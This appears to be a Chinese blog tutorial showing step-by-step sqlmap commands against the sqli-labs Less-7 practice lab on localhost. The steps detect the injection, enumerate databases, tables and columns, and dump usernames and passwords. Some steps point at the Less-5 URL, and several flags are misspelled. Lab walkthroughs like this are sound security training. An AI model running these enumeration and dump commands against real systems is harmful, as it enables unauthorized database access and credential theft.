0
点赞
收藏
分享

微信扫一扫

(slmap)【sqli-labs7】GET请求、文件读写注入:使用方法

目录

​​一、文件读写注入(sqlmap)SQL注入基本步骤:​​

​​二、扩展​​

​​2.1、命令扩展​​

​​2.2、注:​​

​​2.3、推荐:​​

​​ 三、Less7(GET-Dump into outfile - String)​​

​​ 3.1、第一步:检测是否存在注入​​

​​基础操作​​

​​3.2、第二步:爆数据库名​​

​​命令​​

​​基础操作​​

​​3.3、第三步:爆数据库表名​​

​​命令​​

​​基础操作​​

​​3.4、第四步:爆字段名​​

​​命令:​​

​​基础操作​​

​​3.5、第五步:爆数据​​

​​命令:​​

​​基础操作:​​

(sqlmap使用的步骤基本上一样,但是不能小看简单的重复练习,越是简单的,越要牢记)

一、文件读写注入(sqlmap)SQL注入基本步骤:

第一步:注入点测试

第二步:爆数据库名

第三步:爆数据库表

第四步:爆字段

第五步:爆数据

二、扩展

2.1、命令扩展

(1)如果提前找到了数据库类型

--dbms +数据库

(2)扫描的等级

最高等级是

--leve=5 --risk=3

2.2、注:

我使用Windows中的sqlmap做,会带上python sqlmap.py

Linux:直接sqlmap +……

2.3、推荐:

​​(手工)【sqli-labs7】GET请求、文件读写注入:使用方法​​


 三、Less7(GET-Dump into outfile - String)

 3.1、第一步:检测是否存在注入

基础操作

python sqlmap.py 'http://localhost:8080/sqli-labs-master/Less-7/?id=1' --batch

--batch是使用默认设置

(slmap)【sqli-labs7】GET请求、文件读写注入:使用方法_sql

 



(slmap)【sqli-labs7】GET请求、文件读写注入:使用方法_基础操作_02

 


其实环境都扫出来了 

就可以再加上--dbms mysql了


3.2、第二步:爆数据库名

命令

#获取全部数据库

sqlmap.py -u url --dbs --batch

---------

#获取当前数据库

sqlmap.py -u url --current-dbs --batch

基础操作

python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' --dbs --batch

(slmap)【sqli-labs7】GET请求、文件读写注入:使用方法_基础操作_03

 


 (slmap)【sqli-labs7】GET请求、文件读写注入:使用方法_sql_04

 



3.3、第三步:爆数据库表名

命令

python sqlmap.py -u url -D DB --tables --batch

基础操作

python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security --tables --batch

(slmap)【sqli-labs7】GET请求、文件读写注入:使用方法_python_05

 


 (slmap)【sqli-labs7】GET请求、文件读写注入:使用方法_安全_06

 



3.4、第四步:爆字段名

命令:

sqlmap.py -u url -D DB -T TBL --columns --batch

基础操作

python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users --columns --batch

(slmap)【sqli-labs7】GET请求、文件读写注入:使用方法_sql_07

         


(slmap)【sqli-labs7】GET请求、文件读写注入:使用方法_基础操作_08

 



3.5、第五步:爆数据

命令:

sqlmap.py -u url -D DB -T TBL -C "COL1,COL2" --dump --batch

基础操作:

python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users -C "username,password" --dump --batch

(slmap)【sqli-labs7】GET请求、文件读写注入:使用方法_安全_09

 


 (slmap)【sqli-labs7】GET请求、文件读写注入:使用方法_安全_10

 




举报

相关推荐

0 条评论